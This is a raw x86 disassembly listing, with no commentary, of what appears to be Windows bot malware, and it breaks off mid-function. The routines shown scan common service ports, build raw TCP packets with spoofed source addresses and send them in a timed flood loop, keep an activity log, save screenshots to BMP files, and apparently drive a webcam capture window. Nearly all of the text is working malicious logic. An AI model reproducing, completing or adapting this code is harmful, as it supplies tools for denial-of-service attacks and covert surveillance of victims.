sub_417688 proc near ; CODE XREF: sub_41776E+178�p
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
jnz short loc_4176AC
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42B1F4 ; connect
leave
retn
; ---------------------------------------------------------------------------
loc_4176AC: ; CODE XREF: sub_417688+11�j
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+var_C]
push eax
xor edi, edi
push 8004667Eh
inc edi
push esi
mov [ebp+var_C], edi
call ds:dword_42B1E4 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4440AC ; connect
push [ebp+arg_C]
lea eax, [ebp+var_214]
push 0
push eax
lea eax, [ebp+var_110]
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_10C], esi
mov [ebp+var_110], edi
mov [ebp+var_210], esi
mov [ebp+var_214], edi
call dword_4441B0 ; select
test eax, eax
jnz short loc_417712
or eax, 0FFFFFFFFh
jmp short loc_41776A
; ---------------------------------------------------------------------------
loc_417712: ; CODE XREF: sub_417688+83�j
or edi, 0FFFFFFFFh
cmp eax, edi
jz short loc_41775F
lea eax, [ebp+var_110]
push eax
push esi
call sub_4298D6 ; __WSAFDIsSet
test eax, eax
jnz short loc_41773B
lea eax, [ebp+var_214]
push eax
push esi
call sub_4298D6 ; __WSAFDIsSet
test eax, eax
jz short loc_41775F
loc_41773B: ; CODE XREF: sub_417688+A0�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
mov [ebp+var_8], 4
call ds:dword_42B1D4 ; getsockopt
cmp eax, edi
jnz short loc_417763
loc_41775F: ; CODE XREF: sub_417688+8F�j
; sub_417688+B1�j
mov eax, edi
jmp short loc_41776A
; ---------------------------------------------------------------------------
loc_417763: ; CODE XREF: sub_417688+D5�j
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_41776A: ; CODE XREF: sub_417688+88�j
; sub_417688+D9�j
pop edi
pop esi
leave
retn
sub_417688 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_41776E proc near ; CODE XREF: sub_417BC8+51�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 10Ch
push ebx
push esi
push edi
xor esi, esi
inc esi
push esi
xor ebx, ebx
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+6Ch+var_14], esi
call ds:dword_42B1D0 ; WSASocketA
push 4
lea ecx, [ebp+6Ch+var_14]
push ecx
push 2
push ebx
push eax
mov dword_4D5D20, eax
call dword_444120 ; setsockopt
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+6Ch+var_100]
mov [ebp+6Ch+var_7C], ecx
mov [ebp+6Ch+var_10C], ebx
mov [ebp+6Ch+var_108], ebx
mov [ebp+6Ch+var_104], ebx
mov [ebp+6Ch+var_8C], 401h
mov [ebp+6Ch+var_88], 15h
mov [ebp+6Ch+var_84], 16h
mov [ebp+6Ch+var_80], 17h
mov [ebp+6Ch+var_78], 35h
mov [ebp+6Ch+var_74], 50h
mov [ebp+6Ch+var_70], 51h
mov [ebp+6Ch+var_6C], 58h
mov [ebp+6Ch+var_68], 6Eh
mov [ebp+6Ch+var_64], 71h
mov [ebp+6Ch+var_60], 77h
mov [ebp+6Ch+var_5C], 87h
mov [ebp+6Ch+var_58], 89h
mov [ebp+6Ch+var_54], 8Bh
mov [ebp+6Ch+var_50], 8Fh
mov [ebp+6Ch+var_4C], 1BBh
mov [ebp+6Ch+var_48], 1BDh
mov [ebp+6Ch+var_44], 400h
mov [ebp+6Ch+var_40], 599h
mov [ebp+6Ch+var_3C], 5DCh
mov [ebp+6Ch+var_38], 6B8h
mov [ebp+6Ch+var_34], 0CEAh
mov [ebp+6Ch+var_30], 0D3Dh
mov [ebp+6Ch+var_2C], 1388h
mov [ebp+6Ch+var_28], 1A0Bh
mov [ebp+6Ch+var_24], 1F40h
mov [ebp+6Ch+var_20], 1F90h
rep stosd
mov [ebp+6Ch+var_C], ebx
mov [ebp+6Ch+var_1C], 3
mov [ebp+6Ch+var_18], 0BB8h
mov [ebp+6Ch+var_4], ebx
loc_4178AB: ; CODE XREF: sub_41776E+1A5�j
mov eax, [ebp+6Ch+arg_0]
mov edi, [ebp+6Ch+var_4]
mov [ebp+6Ch+var_98], eax
xor eax, eax
lea edi, [ebp+edi+6Ch+var_8C]
mov ax, [edi]
mov [ebp+6Ch+var_9C], 2
push eax
call dword_444260 ; htons
push ebx
push esi
push 2
mov [ebp+6Ch+var_9A], ax
call dword_444100 ; socket
lea ecx, [ebp+6Ch+var_1C]
push ecx
push 10h
lea ecx, [ebp+6Ch+var_9C]
push ecx
push eax
mov [ebp+6Ch+var_8], eax
call sub_417688
add esp, 10h
push [ebp+6Ch+var_8]
mov [ebp+6Ch+var_10], eax
call dword_444218 ; closesocket
cmp [ebp+6Ch+var_10], ebx
jnz short loc_41790B
mov eax, [edi]
mov ecx, [ebp+6Ch+var_4]
mov [ebp+ecx+6Ch+var_10C], eax
loc_41790B: ; CODE XREF: sub_41776E+18F�j
add [ebp+6Ch+var_4], 4
cmp [ebp+6Ch+var_4], 70h
jl short loc_4178AB
push offset asc_42FE58 ; " "
mov esi, offset byte_4D5D28
push esi ; Dest
call _sprintf
mov edi, ds:dword_42B038
pop ecx
pop ecx
call edi ; GetTickCount
mov [ebp+6Ch+var_8], eax
mov [ebp+6Ch+var_4], ebx
loc_417935: ; CODE XREF: sub_41776E+21E�j
call edi ; GetTickCount
sub eax, [ebp+6Ch+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+6Ch+arg_4]
ja short loc_41798E
mov eax, [ebp+6Ch+var_4]
mov eax, [ebp+eax*4+6Ch+var_10C]
cmp eax, ebx
jz short loc_41796B
push eax
push esi
push offset aSD ; "%s%d "
push esi ; Dest
mov [ebp+6Ch+var_C], eax
call _sprintf
add esp, 10h
jmp short loc_417985
; ---------------------------------------------------------------------------
loc_41796B: ; CODE XREF: sub_41776E+1E6�j
push 0FFFFh
push ebx
call sub_41B325
pop ecx
pop ecx
push eax
call dword_444260 ; htons
movzx eax, ax
mov [ebp+6Ch+var_C], eax
loc_417985: ; CODE XREF: sub_41776E+1FB�j
inc [ebp+6Ch+var_4]
cmp [ebp+6Ch+var_4], 1Ch
jl short loc_417935
loc_41798E: ; CODE XREF: sub_41776E+1D8�j
; sub_41776E+448�j
push 28h ; Size
push ebx ; Val
push offset byte_4D5CE0 ; Dst
call _memset
mov esi, 0FFFFh
push esi
push 400h
mov byte_4D5CE0, 45h
mov byte_4D5CE9, 6
mov byte_4D5CE1, 8
call sub_41B325
add esp, 14h
push eax
call dword_444260 ; htons
push 28h
mov word_4D5CE4, ax
call dword_444260 ; htons
cmp dword_4D5898, ebx
mov word_4D5CE2, ax
mov word_4D5CE6, bx
mov byte_4D5CE8, 0FFh
jnz short loc_4179FF
push [ebp+6Ch+arg_0]
call sub_41766A
pop ecx
jmp short loc_417A0A
; ---------------------------------------------------------------------------
loc_4179FF: ; CODE XREF: sub_41776E+284�j
push offset byte_4D5698
call dword_44417C ; inet_addr
loc_417A0A: ; CODE XREF: sub_41776E+28F�j
mov dword_4D5CEC, eax
mov eax, [ebp+6Ch+arg_0]
push 4000h
mov dword_4D5CF0, eax
mov byte_4D5D01, bl
call dword_444260 ; htons
push esi
push ebx
mov word_4D5D02, ax
call sub_41B325
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_41B325
add esp, 10h
add edi, eax
push edi
call dword_444234 ; htonl
mov edi, [ebp+6Ch+arg_0]
mov dword_4D5CF8, eax
mov al, byte_4D5D00
and al, 0Fh
or al, 50h
mov byte_4D5D00, al
mov ax, word ptr [ebp+6Ch+var_C]
push 14h
mov dword_4D5CFC, ebx
mov word_4D5D06, bx
mov word_4D5CF6, ax
mov dword_4D5CC0, edi
mov byte_4D5CC4, bl
mov byte_4D5CC5, 6
call dword_444260 ; htons
mov word_4D5CC6, ax
mov ax, word_4D5CF6
mov word_4D5D0C, 2
mov dword_4D5D10, edi
mov word_4D5D0E, ax
mov [ebp+6Ch+var_4], ebx
jmp short loc_417AC0
; ---------------------------------------------------------------------------
loc_417ABB: ; CODE XREF: sub_41776E+422�j
mov esi, 0FFFFh
loc_417AC0: ; CODE XREF: sub_41776E+34B�j
cmp [ebp+6Ch+var_4], ebx
push esi
push ebx
jnz short loc_417AF4
call sub_41B325
pop ecx
pop ecx
push eax
call dword_444260 ; htons
mov word_4D5CF4, ax
mov eax, dword_4D5CEC
mov dword_4D5CBC, eax
mov byte_4D5D01, 2
mov dword_4D5CFC, ebx
jmp short loc_417B11
; ---------------------------------------------------------------------------
loc_417AF4: ; CODE XREF: sub_41776E+357�j
mov byte_4D5D01, 10h
call sub_41B325
pop ecx
pop ecx
push eax
call dword_444260 ; htons
movzx eax, ax
mov dword_4D5CFC, eax
loc_417B11: ; CODE XREF: sub_41776E+384�j
inc word_4D5CE4
inc dword_4D5CF8
mov ax, word_4D5CF6
push 5
pop ecx
mov word_4D5CEA, bx
mov word_4D5D04, bx
mov esi, offset word_4D5CF4
mov edi, offset dword_4D5CC8
rep movsd
push 14h
mov esi, offset byte_4D5CE0
push esi
mov word_4D5D0E, ax
call sub_402422
push 20h
push offset dword_4D5CBC
mov word_4D5CEA, ax
call sub_402422
add esp, 10h
push 10h
push offset word_4D5D0C
push ebx
push 28h
push esi
push dword_4D5D20
mov word_4D5D04, ax
call dword_4440CC ; sendto
inc [ebp+6Ch+var_4]
cmp [ebp+6Ch+var_4], 3FFh
jl loc_417ABB
call ds:dword_42B038 ; GetTickCount
sub eax, [ebp+6Ch+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+6Ch+arg_4]
ja short loc_417BBB
push [ebp+6Ch+arg_8]
call ds:dword_42B014 ; Sleep
jmp loc_41798E
; ---------------------------------------------------------------------------
loc_417BBB: ; CODE XREF: sub_41776E+43D�j
pop edi
pop esi
mov eax, offset byte_4D5D28
pop ebx
add ebp, 6Ch
leave
retn
sub_41776E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417BC8 proc near ; DATA XREF: sub_40274D+605C�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+Str]
push eax ; Str
call j__atol
pop ecx
push eax
lea eax, [ebp+var_190]
push eax ; Str
call j__atol
pop ecx
push eax
lea eax, [ebp+var_210]
push eax
call dword_44417C ; inet_addr
push eax
call sub_41776E
push eax
lea eax, [ebp+Dest]
push offset asc_435CCC ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_417C5A
push esi ; int
push [ebp+var_C] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_214] ; int
call sub_40123B
add esp, 14h
loc_417C5A: ; CODE XREF: sub_417BC8+70�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
push [ebp+var_10]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_417BC8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417C78(char *Str2,int)
sub_417C78 proc near ; CODE XREF: sub_40274D+6E31�p
var_4 = dword ptr -4
Str2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_4D1450
mov edi, 0B8h
loc_417C8C: ; CODE XREF: sub_417C78+33�j
cmp byte ptr [esi], 0
jz short loc_417CAF
push [ebp+Str2] ; Str2
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_417CAF
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_4D1FD0
jl short loc_417C8C
jmp short loc_417CF1
; ---------------------------------------------------------------------------
loc_417CAF: ; CODE XREF: sub_417C78+17�j
; sub_417C78+26�j
mov esi, [ebp+var_4]
imul esi, 0B8h
push ebx
push edi ; Size
lea ebx, dword_4D1450[esi]
push 0 ; Val
push ebx ; Dst
call _memset
push 17h ; Count
push [ebp+Str2] ; Source
push ebx ; Dest
call _strncpy
push 9Fh ; Count
push [ebp+arg_4] ; Source
lea eax, dword_4D1468[esi]
push eax ; Dest
call _strncpy
add esp, 24h
inc dword_43C498
pop ebx
loc_417CF1: ; CODE XREF: sub_417C78+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_417C78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417CF8(int,char *Str,int)
sub_417CF8 proc near ; CODE XREF: sub_40274D+26BC�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_435D0C ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
xor edi, edi
mov esi, offset dword_4D1450
loc_417D22: ; CODE XREF: sub_417CF8+72�j
cmp byte ptr [esi], 0
jz short loc_417D5D
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_ ; "%d. "
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 2Ch
loc_417D5D: ; CODE XREF: sub_417CF8+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_4D1FD0
jl short loc_417D22
pop edi
pop esi
leave
retn
sub_417CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417D70 proc near ; CODE XREF: sub_401F92+320�p
; sub_4022F5+B5�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call ds:dword_42B0D4 ; GetLocalTime
mov ebx, offset dword_4DA128
mov edi, 80h
mov esi, offset byte_4D6128
loc_417D92: ; CODE XREF: sub_417D70+3D�j
cmp byte ptr [ebx], 0
jz short loc_417DA9
push 7Fh ; Count
lea eax, [ebx+80h]
push ebx ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_417DA9: ; CODE XREF: sub_417D70+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_417D92
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_417D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417DE4(char *Format,char Args)
sub_417DE4 proc near ; CODE XREF: sub_4025EF+BA�p
; sub_40274D+6DAA�p ...
Dest = byte ptr -80h
Format = dword ptr 8
Args = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+Args]
push eax ; Args
push [ebp+Format] ; Format
lea eax, [ebp+Dest]
push 80h ; Count
push eax ; Dest
call __vsnprintf
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 14h
leave
retn
sub_417DE4 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_417E10(int,char *Str,int,int)
sub_417E10 proc near ; CODE XREF: sub_40274D+25BD�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset byte_4D6128
xor ecx, ecx
loc_417E17: ; CODE XREF: sub_417E10+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_4DA128
jl short loc_417E17
cmp [esp+arg_C], ecx
jnz short loc_417E45
push ecx ; int
push [esp+4+arg_8] ; int
push offset dword_435D58 ; int
push [esp+0Ch+Str] ; Str
push [esp+10h+arg_0] ; int
call sub_40123B
add esp, 14h
loc_417E45: ; CODE XREF: sub_417E10+19�j
push offset dword_435D44
call sub_417D70
pop ecx
retn
sub_417E10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_417E51 proc near ; DATA XREF: sub_40274D+266A�o
Dest = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 31Ch
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+74h+var_10], edx
mov [ebp+74h+var_8], 80h
mov [ebp+74h+var_4], edx
mov [eax+110h], edi
jnz short loc_417EA6
push edx ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+var_118]
push offset dword_435D88 ; int
push eax ; Str
push [ebp+74h+var_11C] ; int
call sub_40123B
add esp, 14h
loc_417EA6: ; CODE XREF: sub_417E51+35�j
cmp [ebp+74h+Str], 0
jz short loc_417EC0
lea eax, [ebp+74h+Str]
push eax ; Str
call j__atol
test eax, eax
pop ecx
mov [ebp+74h+var_4], eax
jz short loc_417EC0
mov [ebp+74h+var_8], eax
loc_417EC0: ; CODE XREF: sub_417E51+59�j
; sub_417E51+6A�j
and [ebp+74h+arg_0], 0
mov esi, offset byte_4D6128
loc_417EC9: ; CODE XREF: sub_417E51+CA�j
mov eax, [ebp+74h+arg_0]
cmp eax, [ebp+74h+var_8]
jge short loc_417F1D
cmp byte ptr [esi], 0
jz short loc_417F0C
cmp [ebp+74h+Str], 0
jz short loc_417EF2
cmp [ebp+74h+var_4], 0
jnz short loc_417EF2
lea eax, [ebp+74h+Str]
push eax ; int
push esi ; Str
call sub_41B39F
test eax, eax
pop ecx
pop ecx
jz short loc_417F0C
loc_417EF2: ; CODE XREF: sub_417E51+89�j
; sub_417E51+8F�j
push edi ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+var_118]
push esi ; int
push eax ; Str
push [ebp+74h+var_11C] ; int
call sub_40123B
add esp, 14h
loc_417F0C: ; CODE XREF: sub_417E51+83�j
; sub_417E51+9F�j
inc [ebp+74h+arg_0]
add esi, 80h
cmp esi, offset dword_4DA128
jl short loc_417EC9
loc_417F1D: ; CODE XREF: sub_417E51+7E�j
lea eax, [ebp+74h+Dest]
push offset asc_435D6C ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
cmp [ebp+74h+var_10], esi
pop ecx
pop ecx
jnz short loc_417F57
push esi ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_118]
push eax ; Str
push [ebp+74h+var_11C] ; int
call sub_40123B
add esp, 14h
loc_417F57: ; CODE XREF: sub_417E51+E4�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_18]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_417E51 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_417F75 proc near ; CODE XREF: sub_40274D+6F5D�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 484h
push esi
push edi
xor esi, esi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call dword_444250 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+74h+var_20], edi
jnz short loc_417FA2
xor eax, eax
jmp loc_4181AB
; ---------------------------------------------------------------------------
loc_417FA2: ; CODE XREF: sub_417F75+24�j
push ebx
push 8
push edi
call dword_444178 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+74h+var_C], eax
call dword_444178 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+74h+var_4], eax
call dword_444178 ; GetDeviceCaps
cmp eax, 8
mov [ebp+74h+var_10], eax
ja short loc_417FDC
push 18h
push edi
call dword_444178 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_417FDE
; ---------------------------------------------------------------------------
loc_417FDC: ; CODE XREF: sub_417F75+55�j
xor ebx, ebx
loc_417FDE: ; CODE XREF: sub_417F75+65�j
push edi
call dword_444180 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+74h+var_8], eax
jz loc_41818D
mov eax, [ebp+74h+var_C]
mov [ebp+74h+var_80], eax
mov eax, [ebp+74h+var_4]
mov [ebp+74h+var_7C], eax
mov ax, word ptr [ebp+74h+var_10]
push esi
push esi
mov [ebp+74h+var_76], ax
lea eax, [ebp+74h+var_18]
push eax
push 1
lea eax, [ebp+74h+var_84]
push eax
push edi
mov [ebp+74h+var_84], 28h
mov [ebp+74h+var_78], 1
mov [ebp+74h+var_74], esi
mov [ebp+74h+var_70], esi
mov [ebp+74h+var_6C], esi
mov [ebp+74h+var_68], esi
mov [ebp+74h+var_64], ebx
mov [ebp+74h+var_60], ebx
call dword_44421C ; CreateDIBSection
cmp eax, esi
mov [ebp+74h+var_1C], eax
jz loc_418198
push eax
push [ebp+74h+var_8]
call dword_44408C ; SelectObject
cmp eax, esi
jz loc_418198
cmp eax, 0FFFFFFFFh
jz loc_418198
push 0CC0020h
push esi
push esi
push edi
push [ebp+74h+var_4]
push [ebp+74h+var_C]
push esi
push esi
push [ebp+74h+var_8]
call dword_444190 ; BitBlt
test eax, eax
jz loc_418198
cmp ebx, esi
jz short loc_418095
lea eax, [ebp+74h+var_484]
push eax
push ebx
push esi
push [ebp+74h+var_8]
call dword_4441C0 ; GetDIBColorTable
mov ebx, eax
loc_418095: ; CODE XREF: sub_417F75+10A�j
mov edi, [ebp+74h+var_10]
imul edi, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_C]
imul edi, ecx
push esi
push 80h
push 2
mov eax, ebx
shl eax, 2
mov [ebp+74h+var_C], eax
shr edi, 3
lea edx, [eax+edi+36h]
add eax, 36h
push esi
mov [ebp+74h+var_26], eax
mov eax, [ebp+74h+var_4]
push esi
push 40000000h
push [ebp+74h+arg_0]
mov [ebp+74h+var_50], eax
mov ax, word ptr [ebp+74h+var_10]
mov [ebp+74h+var_30], 4D42h
mov [ebp+74h+var_2E], edx
mov [ebp+74h+var_2A], si
mov [ebp+74h+var_28], si
mov [ebp+74h+var_58], 28h
mov [ebp+74h+var_54], ecx
mov [ebp+74h+var_4C], 1
mov [ebp+74h+var_4A], ax
mov [ebp+74h+var_48], esi
mov [ebp+74h+var_44], esi
mov [ebp+74h+var_40], esi
mov [ebp+74h+var_3C], esi
mov [ebp+74h+var_38], ebx
mov [ebp+74h+var_34], esi
call ds:dword_42B08C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jz short loc_418178
push esi
lea ecx, [ebp+74h+var_14]
push ecx
push 0Eh
lea ecx, [ebp+74h+var_30]
push ecx
push eax
call ds:dword_42B084 ; WriteFile
push esi
lea eax, [ebp+74h+var_14]
push eax
push 28h
lea eax, [ebp+74h+var_58]
push eax
push [ebp+74h+var_4]
call ds:dword_42B084 ; WriteFile
cmp ebx, esi
jz short loc_41815A
push esi
lea eax, [ebp+74h+var_14]
push eax
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_484]
push eax
push [ebp+74h+var_4]
call ds:dword_42B084 ; WriteFile
loc_41815A: ; CODE XREF: sub_417F75+1CB�j
push esi
lea eax, [ebp+74h+var_14]
push eax
push edi
push [ebp+74h+var_18]
push [ebp+74h+var_4]
call ds:dword_42B084 ; WriteFile
push [ebp+74h+var_4]
call ds:dword_42B004 ; CloseHandle
xor esi, esi
inc esi
loc_418178: ; CODE XREF: sub_417F75+1A1�j
push [ebp+74h+var_1C]
call dword_444184 ; DeleteObject
push [ebp+74h+var_8]
call dword_444130 ; DeleteDC
mov edi, [ebp+74h+var_20]
loc_41818D: ; CODE XREF: sub_417F75+75�j
push edi
call dword_444130 ; DeleteDC
mov eax, esi
jmp short loc_4181AA
; ---------------------------------------------------------------------------
loc_418198: ; CODE XREF: sub_417F75+C6�j
; sub_417F75+D8�j ...
push edi
call dword_444130 ; DeleteDC
push [ebp+74h+var_8]
call dword_444130 ; DeleteDC
xor eax, eax
loc_4181AA: ; CODE XREF: sub_417F75+221�j
pop ebx
loc_4181AB: ; CODE XREF: sub_417F75+28�j
pop edi
pop esi
add ebp, 74h
leave
retn
sub_417F75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181B2 proc near ; CODE XREF: sub_40274D+7071�p
var_38 = byte ptr -38h
var_24 = dword ptr -24h
Src = dword ptr -0Ch
Size = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
xor esi, esi
inc esi
push esi
push dword_4DA128
xor ebx, ebx
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call dword_444138
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_4181F0
mov eax, esi
jmp loc_4183A6
; ---------------------------------------------------------------------------
loc_4181F0: ; CODE XREF: sub_4181B2+35�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_41820D
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call dword_4441CC ; SendMessageA
jmp short loc_41820F
; ---------------------------------------------------------------------------
loc_41820D: ; CODE XREF: sub_4181B2+47�j
xor eax, eax
loc_41820F: ; CODE XREF: sub_4181B2+59�j
cmp eax, ebx
jnz short loc_41821A
loc_418213: ; CODE XREF: sub_4181B2+88�j
; sub_4181B2+BC�j
mov ebx, esi
jmp loc_41839B
; ---------------------------------------------------------------------------
loc_41821A: ; CODE XREF: sub_4181B2+5F�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418237
lea eax, [ebp+var_38]
push eax
push 2Ch
push 40Eh
